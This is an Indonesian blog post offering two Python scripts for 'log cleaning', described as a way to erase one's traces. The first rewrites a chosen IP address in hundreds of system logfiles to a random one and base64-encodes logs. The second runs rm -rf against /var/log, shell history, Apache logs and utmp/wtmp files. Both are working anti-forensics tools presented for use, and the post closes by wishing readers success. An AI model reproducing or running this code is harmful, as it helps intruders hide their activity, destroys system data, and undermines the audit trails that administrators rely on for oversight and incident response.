Headline News:
Home » , , » [Source Code] Log Cleaner - Python

[Source Code] Log Cleaner - Python

Share code untuk tools pembersih “log”dengan menggunakan phython, manfaatnya adalah anda bisa menghilangkan jejak sejenak dari log yang tersimpan.

Berikut ini codenya:



  • #!/usr/bin/python
  • #PyLogcleaner uses the list given (logfiles) containing
  • # 274 logfiles and uses the linux find 
  • #cmd to try and locate more logfiles to search
  • #for an ip address to replace with a random generated
  • #one. It can also encrypt/d3crypt a 
  • #logfile and also can watch a logfile for modifications.


  • import os, sys, time, pwd, getopt, re, random, StringIO, commands

  • def title():
  • print "\n   PyLogCleaner v1.0"
  • print "-----------------------------------------------"

  • def usage():
  • title()
  • print "\n  Usage: python logcleaner.py <option>\n"
  • print "\t[options]"
  • print "\t   -i <ip>: Ip to search for and replace"
  • print "\t   -e <file>: Encrypts logfile"
  • print "\t   -d <file>: Decrypts logfile"
  • print "\t   -w/-watch <file> <time to check> : Watches logfile for modification"
  • print "\t   -h/-help: Prints this menu\n"

  • def timer():
  • now = time.localtime(time.time())
  • return time.asctime(now)

  • def validater(logs):
  • activeLogs = []

  • print "[+] Validating:",len(logs),"logfiles\n"
  • for l in logs:
  • if os.path.isfile(l) == True:
  • activeLogs.append(l)
  • if len(activeLogs)>0:
  • print "[+] Active Logs Found:",len(activeLogs)
  • return activeLogs
  • else:
  • print "[-] No Active Logs Found"
  • sys.exit(1)
  • def search(logfiles):
  • print "\n[+] Searching:",ip,"\n"
  • import mmap
  • for file in logfiles:
  • try:
  • f = open(file, "rb+")
  • size = os.path.getsize(file)
  • if size >= 1:
  • data = mmap.mmap(f.fileno(), size)
  • loc = data.find(ip)
  • #Lets not search a file with no data.
  • if loc == -1:
  • #print "[+] File:",file,"|",size,"bytes"
  • #print "\t[-] IP not found"
  • data.close()
  • else:
  • print "-"*45
  • print "[+] File:",file,"|",size,"bytes"
  • print "\t[+] IP found"
  • data.seek(loc)
  • data.write(randip)
  • print "[+] Replaced: ",ip,">>",randip
  • print "[+] New_Size:",os.path.getsize(file),"bytes"
  • print "-"*45
  • data.close()
  • except(IOError), msg:
  • pass
  • print "\n[+] Done:",timer(),"\n"
  • def findlogs():
  • os.chdir("/")
  • print "[+] Finding More Logfiles..."
  • #Lets use the linux find cmd to fing more files containing log...
  • logz = StringIO.StringIO(commands.getstatusoutput('find . -iname *log -perm -444 -print')[1]).readlines()
  • if len(logz)>0:
  • print "[+] Found:",len(logz),"extra logfiles"
  • for log in logz:
  • if re.search("Permission denied",log) == None:
  • logs.append(log[:-1]) 
  • return logs
  • def randip():
  • A = random.randrange(255) + 1
  • B = random.randrange(255) + 1
  • C = random.randrange(255) + 1
  • D = random.randrange(255) + 1
  • randip = "%d.%d.%d.%d" % (A,B,C,D)
  • return randip

  • def gettime():
  • clock = time.asctime(time.localtime(os.path.getmtime(logfile)))
  • return clock

  • def getsize():
  • size = os.path.getsize(logfile)
  • return size

  • def modlast(logfile):
  • try: 
  • sys.argv[3]
  • except(IndexError):
  • print "\n[-] Need a time in seconds (ex: 60)\n"
  • sys.exit(1)
  • print "[+] Analyzing:",logfile
  • print "[+] Time:",sys.argv[3],"secs"
  • print "[+] Owner:",pwd.getpwuid(os.stat(logfile)[4])[0]
  • print "[+] Size:",getsize(),"bytes"
  • print "[+] Last Modified:",gettime()
  • print "[+] Starting:",timer()

  • old_time = gettime()
  • while True:
  • time.sleep(int(sys.argv[3]))
  • new_time = gettime()
  • if new_time != old_time:
  • print "\n[+] File Modified:",new_time
  • print "[+] New Size:",getsize(),"bytes\n"
  • old_time = new_time
  • def encrypter(file):
  • import base64
  • print "\n[+] Encrypting:",file
  • print "[+] Size:",os.path.getsize(file),"bytes"
  • try:
  •    log2encode = open(file, "r").read()
  • except(IOError): 
  •    print "Error: Check your full path.\n"
  •    sys.exit(1)
  • log2encode = base64.b64encode(log2encode)
  • os.remove(file)
  • time.sleep(2)
  • f = open(file, "a")
  • f.write(log2encode)
  • f.close()
  • print "[+] NewSize:",os.path.getsize(file),"bytes"
  • print "[+] Done\n"

  • def d3crypter(file):
  • import base64
  • print "\n[+] Decrypting:",file
  • print "[+] Size:",os.path.getsize(file),"bytes"
  • try:
  •    b2log = open(file, "r").read()
  • except(IOError): 
  •    print "Error: Check your full path.\n"
  •    sys.exit(1)
  • b2log = base64.b64decode(b2log)
  • os.remove(file)
  • time.sleep(2)
  • f = open(file, "a")
  • f.write(b2log)
  • f.close()
  • print "[+] NewSize:",os.path.getsize(file),"bytes"
  • print "[+] Done\n"

  • if len(sys.argv) <= 1:
  • usage()
  • sys.exit(1)
  • if len(sys.argv) == 2:
  • usage()
  • sys.exit(1)

  • if sys.argv[1] == "-w" or sys.argv[1] == "-watch":
  • logfile = sys.argv[2]
  • if os.path.isfile(logfile) == False:
  • title()
  • print "\n[-] Cannot Open File, Check Full Path!!!\n"
  • sys.exit(1)
  • else:
  • title()
  • modlast(logfile)
  • if sys.argv[1] == "-i":
  • ip = sys.argv[2]
  • try:
  •    logs = open("logfiles", "r").readlines()
  • except(IOError): 
  •    print "Error: logfiles missing\n"
  •    sys.exit(1)
  • title()
  • print "\n[+] Starting:",timer()
  • print "[+] Loaded:",len(logs),"logs"
  • findlogs()
  • randip = randip()
  • print "[+] Generate Random IP:",randip
  • search(validater(logs))
  • if sys.argv[1] == "-e":
  • file = sys.argv[2]
  • title()
  • encrypter(file)
  • if sys.argv[1] == "-d":
  • file = sys.argv[2]
  • title()
  • d3crypter(file)

Bisa Juga Menggunakan Tools dari vodork YCL berikut:


Code:

  • #!/usr/bin/env
  • python

  • import threading
  • import os
  • from time import sleep, ctime

  • print'''
  • _ _ ___ _
  • ( ) ( )( _`\ ( )
  • `\`\_/'/'| ( (_)| |
  • `\ /' | | _ | | _
  • | | | (_( )| |_( )
  • (_) (____/'(____/'og cleaner

  • Kinds Regard
  • ./VodOrkYCL.py
  • '''
  • lt = ctime()
  • print '[+] Starting log cleaner at %s\n\n' %(lt)
  • sleep(5)

  • class output_command(threading.Thread):
  • def __init__(self, command):
  • threading.Thread.__init__(self)
  • self.command = command
  • def run(self):
  • os.system(self.command)
  • print "[+]log was finish to clean......\n"

  • class input_command:
  • def __init__(self):
  • clear_add = ["rm -rf /tmp/logs","rm -rf $HISTFILE","rm
  • -rf /root/.ksh_history","rm -rf /root/.bash_history","rm -rf
  • /root/.bash_logout","rm -rf /usr/local/apache/logs","rm -rf
  • /usr/local/apache/logs","rm -rf /usr/local/apache/log","rm -rf
  • /var/apache/logs","rm -rf /var/apache/log","rm -rf /var/run/utmp","rm
  • -rf /var/logs","rm -rf /var/log","rm -rf /var/adm","rm -rf
  • /etc/wtmp","rm -rf /etc/utmp"]
  • for listt in clear_add:
  • try:
  • i=output_command(listt)
  • i.start()
  • except:
  • pass

  • if __name__ == "__main__":
  • objCaller = input_command()



 Selamat mencoba, semoga berhasil!

Share this article :
Label: , ,
Comments
0 Comments

Tidak ada komentar:

Posting Komentar

 
this is RYB ART | Site Meter
Copyright © 2012. RIZKY YANDA BAHRI ART COM - All Rights Reserved